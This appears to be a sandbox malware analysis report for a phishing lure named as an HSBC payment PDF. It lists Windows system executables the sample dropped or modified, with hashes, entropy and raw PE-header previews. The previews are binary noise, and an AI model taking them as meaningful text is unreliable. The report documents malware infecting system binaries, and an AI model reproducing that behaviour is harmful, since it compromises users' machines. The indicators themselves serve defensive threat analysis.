                                                                                                                                                                              SHA-512:79890544749BB6EE4CDC8BF6B6D3B552E65310D054B6D53F5468D03E68D2D4BED1F1D9861ECA58D86F8D07E9CC2BA73D43619EBBA7337D79D881A502A22F4ED3
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P............ ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\Locator.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1296896
                                                                                                                                                                              Entropy (8bit):4.515592491141312
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:8TiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:8n/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:27C76B862642ACB46AB7DEFBFD73BFA7
                                                                                                                                                                              SHA1:EFDBBA87271430C9E85F0C09FF292BC570D78073
                                                                                                                                                                              SHA-256:7D32C93BBEB70525D2ACBFDE6B885851982B48120F64DEC45886B856C45D132D
                                                                                                                                                                              SHA-512:A12509B4FCA53EDE3A439653FE8033F2E535D11B2FF75F7AD634A2E0D33542BA7C561514C5FFD658E1E0D1A56B57CD657BD2F88693695984FC9F8D261EE69063
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.......................................... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...`...`.......*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                              Entropy (8bit):0.3234733658880588
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:zfl180kqF69Fq5zzRj6CzE5Z2+fqjFHfl3:rY1WiY+fC/F
                                                                                                                                                                              MD5:D061D1B03DA7C5A9384B0851D5C5447E
                                                                                                                                                                              SHA1:2A0997D859FBB539DAF8B15628C2B27FF1B220C8
                                                                                                                                                                              SHA-256:8D50748EA111252CDF3075CA86BF0CB0835DE20DE85CAA49FF9A3C854B92E3AB
                                                                                                                                                                              SHA-512:94085323662EC03F7F4AA385344491FAA9B7F2CAB0F2C6E02E9F32DCDF7E1956C78C7E172579EC6BAA2F15684AD16EB1CF41615ACFDEAA4E37C6D44879941605
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.@..X...X.......................................X...!...........................(........................@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............0..U.K..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\OpenSSH\ssh-agent.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1667072
                                                                                                                                                                              Entropy (8bit):4.823186761048377
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:oAL3UTP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oAL3UTLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2DAADB2D9EE99D7F3C6EB0FA254025A1
                                                                                                                                                                              SHA1:56D03E371725C0E9D29979440983A99F2642215E
                                                                                                                                                                              SHA-256:6DD3F2E44952168E20172BD30A343F1BEA5B1281EE431090ABDB393179F43BBE
                                                                                                                                                                              SHA-512:9A6F1D5AFD35069708A77C337C28107E76149CD97E7F98C2E4B8AE3EBA31453B8F3E8D57C4D52752DB579154FAB6EFD97BAF68399E3FDC6A3B4FCE5B1E3C6477
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@..............................%........... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...`...0......................@...........................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1391616
                                                                                                                                                                              Entropy (8bit):4.703231452438177
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:GOw/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GOwLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:F3D51ACFF199999586D8F7FCE77371CB
                                                                                                                                                                              SHA1:9B709822860AEF97057C0180F97883327E4E194A
                                                                                                                                                                              SHA-256:2B6F58302BC86D2C37AF77505C9E6C41B6BD87FBD8894755FBC364F1239E3241
                                                                                                                                                                              SHA-512:79A2EE116CEC9B52388025B9967E9EB160B666690D1213CD3D883932AFE5E04B64868344C23C113934509B7DBA3B7C95094159669639704AECC198EC95E59A55
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@............................. ........... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                              Entropy (8bit):7.094171742001237
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:k3frCoQ9tLsiLPLe24CxruW4bIhllP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:k3fIsIPLkCNuVbIhDPLNiXicJFFRGNzb
                                                                                                                                                                              MD5:72A7E20B40A8835CB1F0E27727892C04
                                                                                                                                                                              SHA1:BD84408C913AF9F25445ED22B4F3447E273B1597
                                                                                                                                                                              SHA-256:51AF564A3CA7607A1F99E643557A81B76FF5A20284B899535C5C6C037D79FC63
                                                                                                                                                                              SHA-512:48AFAE0DC64FF056D0B07FC9347EF275CACA744233E734EF6573CAEE38835E2C59692167D2D73A2C63BC1FF78CA95E01F1A840C8C83AEFD5222092873B2B9992
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@....................................~..... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\SensorDataService.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):1846784
                                                                                                                                                                              Entropy (8bit):6.9327025005797225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:TF2YuHNETovAvNYf8kmbLNiXicJFFRGNzj3:C6BCf8kw7wRGpj3
                                                                                                                                                                              MD5:B5B69EF9D3C1E73A01C81AE80208DDC4
                                                                                                                                                                              SHA1:9F0642707F10F1FF3504F3DFB8D8B5C9918C79D5
                                                                                                                                                                              SHA-256:967C792DD0ECB2D3765C349B751562B00DCB9BF21FA7FCE6E5199727D3F7DFE5
                                                                                                                                                                              SHA-512:C5EC8025E4A0F7523B4E391115F10C6A3664F34AAD29D6DD76C5D90CC4B9CDA9E7D35B4393E9E2F0BE3105ADD1ABF44D62F8CEE3EC0A8FE6130AE5CB4387A0F8
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p........... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\Spectrum.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1455616
                                                                                                                                                                              Entropy (8bit):7.230975190409546
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:UiW6ZvAKF5i/dN9Bde9j9Trk+Fz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:UYxF50b9Bdu9Tx9LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:72181D2F9FF55560F9C4B3AB19C98A62
                                                                                                                                                                              SHA1:37FE863594185CAE54494D71717736C7ABD88EDF
                                                                                                                                                                              SHA-256:CA06623D2F3D1241CC585CBF17216C95DDC2F6279821A43E485029AAD8584D3F
                                                                                                                                                                              SHA-512:CE2EC21D19773A996756AE6940ABF1F356AC2BD9FDD9B4B0C0BE1360B8B707521583E9E99E041BA4A69C98216ABA7BA8CA0FB3F85D85BE9BF7447CC2E5E6BC17
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.....................................M.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\TieringEngineService.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1611264
                                                                                                                                                                              Entropy (8bit):5.048875121989025
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:3JnJ5D3WXS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3JnJ5DGXSLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:5E4593411714FE016FDCC665AFE5D552
                                                                                                                                                                              SHA1:1D48797B33B47AF80B23BB46E9C5D771944BCAF2
                                                                                                                                                                              SHA-256:D1C0AC067719FF2EAF09E13CAAB14F208553408C7E855F56C79982E21E568A6D
                                                                                                                                                                              SHA-512:76E60D4E1DF80A11E6CFA67EC5580622898DB334B18E442035B154C13B44B3D748DDDD25963AA30CC4035A78FE28686570651051F5FBA728BB107F3F833BD48F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@..............................#......=.... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...`...0......................@...................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\VSSVC.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2075136
                                                                                                                                                                              Entropy (8bit):6.729881524298672
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:fPK8mJYTerDjfJ2313e1mP1MdnURLNiXicJFFRGNzj3:Z7wRGpj3
                                                                                                                                                                              MD5:90420B1BFAA6B7760AA760FB6F16CA8E
                                                                                                                                                                              SHA1:04E83807F1439C81D20DCF638186D6C907F1CF8F
                                                                                                                                                                              SHA-256:B7D4834859C4D6313F99D31474D2A9913740100805179B29E4DEE1A6374F545F
                                                                                                                                                                              SHA-512:3CCB4B127ACDFD21054FF652F7196CDE8EF768CB5479D95079D596293CA1C7B82C4E1F8AF2E9C69A6F4B612FAC69E16760D134B4C4EDCAE699C10D51AE19D38D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ......: ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\alg.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1381376
                                                                                                                                                                              Entropy (8bit):4.682132078917755
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:onN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:onNLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2AF371D31DE2620D08F24582BCC94F36
                                                                                                                                                                              SHA1:954B8925FB5E7BEED04C9F387CD5ADE6DE7988C0
                                                                                                                                                                              SHA-256:3672775ED17AB98A2833CB588020B43645A6CBACC55E5B2567756434DDBA014F
                                                                                                                                                                              SHA-512:8B40A0AE51EA61CDE604BF9DBAF83E73BB65E2F2509742C5253C83EECE77BF68C20AC6854EFE560C09372DA94BF2531AEF32B7C664780EB70BB06F0418F88020
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.............................. ........... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...`...........t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\msdtc.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1434112
                                                                                                                                                                              Entropy (8bit):4.680774906200706
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:aIy2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:aIBLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:AAA284FF086F56BEC322CDE13CE5989C
                                                                                                                                                                              SHA1:7764C89A9603F5EE9A920307DD215188F0ACB899
                                                                                                                                                                              SHA-256:44A55C3BC5C40FCB3D0819BF81DA43166A7C4C086000C3F66E782C99463F14F5
                                                                                                                                                                              SHA-512:55959E1C09F95103C8125D2E70EDBA58415FD5A50D782AFA25DED247D1A2AB2EEEA28C2729D4189DE7306BBACF8DC9265C41BBAB954919A0E1E55E2204D1E3DC
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@..............................!......&.... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...`...........B..............@...................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\msiexec.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1355264
                                                                                                                                                                              Entropy (8bit):4.598859870053783
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:04KCiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:SE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:C7CAA8E47900764B066134787F8A8BC7
                                                                                                                                                                              SHA1:76C98FDBC352019B9D61FC81CDA693BE0E5690F1
                                                                                                                                                                              SHA-256:050F1A2985EE832A293FBEBB75A98735DE866660A2D7A4589C4A689D365A4DC8
                                                                                                                                                                              SHA-512:040509033554913B0E70A5FECBD20F5AC44B3433B74E9EF57BF901FFCBA96F538FC36C5A8B92BDFE80320EAC8F212046B49FC6F00C28191600095411596B73A2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@....................................zG.... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...`...`......................@...........................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\snmptrap.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1302528
                                                                                                                                                                              Entropy (8bit):4.527059693137494
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:CyXiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z7:Lj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:C3DD833FAFF8B6217772A5E66FF25F25
                                                                                                                                                                              SHA1:8EA2B0D9311079763A9D7DEF4D4C04B8BD086332
                                                                                                                                                                              SHA-256:1C416E9BE5B07C9E146546343A8A8C31AB4B4BB4F167D11CBA3692019E4A8346
                                                                                                                                                                              SHA-512:50F0C3F9D47573D971FC74DE263F356E68DD2F7160872726DEA127AE88829A3916760220B33AB332EE1F458FBFD6EB22CAB26BCF31E28FF0758522F9F68FFE39
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.......................................... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\vds.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1303552
                                                                                                                                                                              Entropy (8bit):7.1607520397020705
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:kZ0FxT1UoYr99GdcJKm/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4wWsmLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:D2428B28D20D38757D35F80B6491A864
                                                                                                                                                                              SHA1:59D3A274666C0A231F932EB704A710CA97416B01
                                                                                                                                                                              SHA-256:AAA39F1530029D220335FACD4E8480F915CC0EF8C88EE2417CE7D91FF2CF2B41
                                                                                                                                                                              SHA-512:C76EC5A775A92091D9A6BD989DC0CD4FF88FA948B4C82687DBC85AA0A2105C8E089AD6D2848BE6A8C4340C2CAD83988BBB4ECD0322B9F898189F6CE5B83FCC2B
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@......3Y.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1495040
                                                                                                                                                                              Entropy (8bit):4.819234563906032
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:9yocDApl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:AocDAplLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:B3EFF6E9F06FD02074538D773AF5CAE9
                                                                                                                                                                              SHA1:03677B8E19E04DD8942E7DF8010BA3873CA764B9
                                                                                                                                                                              SHA-256:8CAB7B9A29BF4793DCCF10BFB72902D6506CCCADFCEEE2816C5EE5FF4EDF5369
                                                                                                                                                                              SHA-512:C429B6BE791F3CA1BC0EABE724CD6A80D6471D924C9409DB1D2E5B8E5995C43CB4E5335C45B949CFC3B45F8D612C4D63A99FC54612641F7A1D9E898AF84E8904
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@..............................!........... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...`...p.......0..............@...........................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\System32\wbengine.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2164736
                                                                                                                                                                              Entropy (8bit):7.056787493628267
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:yWcnPqQUGpuphwC0DNLDpaRFXrLuWGMK8IKxLNiXicJFFRGNzj3:k0zuNIP7wRGpj3
                                                                                                                                                                              MD5:7FEABE370E82D30A720E4A9459EFC1EB
                                                                                                                                                                              SHA1:AE461A8D4DC686A1A2DCB68F284A359803249078
                                                                                                                                                                              SHA-256:3FA83425634CC23B954FD5A22F5E289C2180CDA3E66E0EADF29B857B28E19943
                                                                                                                                                                              SHA-512:CD8AD9EF8B037D8E88B76BD961C271A7357B78F9618147260DFC8056C9185F443F141BB33DA773C1CBD9AC6794C2A0A36671BB4638F964B4EDCD4BDFC6A41684
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.......!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):0.10002116231540173
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:Qcqf1K3l/k/uMclF6vMclFq5zzT1pDNOn+SkUeYDwDzymhf1zj:nqdKV/kqF69Fq5zzRHO+pawHymhdv
                                                                                                                                                                              MD5:A2208544A597AF26E95A01740F70332F
                                                                                                                                                                              SHA1:C7BC906E61579A0322258056299946D3A53F8591
                                                                                                                                                                              SHA-256:3CBB84FC6D5CBD0613F71454B7EC3917D710725F814D8E547C2B5652A2F84510
                                                                                                                                                                              SHA-512:FA3809EB0569F7E882A41EBEC558254A37636C3249A3C38CF682160B2821702D7B667918C0B072043BB33F848C071E4CC595B2C87A3CAADA3C4B0D0DF1547256
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....`...`.......................................`...!...........................t...p...Y.P.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W.................V.K..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.t...p...Y.P.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):0.10148832067800173
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:DB/l1K3l/k/uMclF6vMclFq5zzT1pq1NMu3n+SkUeYDwDzyMx/l1zb:DBHKV/kqF69Fq5zzRknX+pawHymHn
                                                                                                                                                                              MD5:BEC2E9233360D65D16BFEB713E205B61
                                                                                                                                                                              SHA1:4C8F63538C2F5CFA79224C845628EF2A545A1CE3
                                                                                                                                                                              SHA-256:245688BBA509069AB4B4D114C57DFD54B0E403C8F7A7A837C30747435B5F6FD0
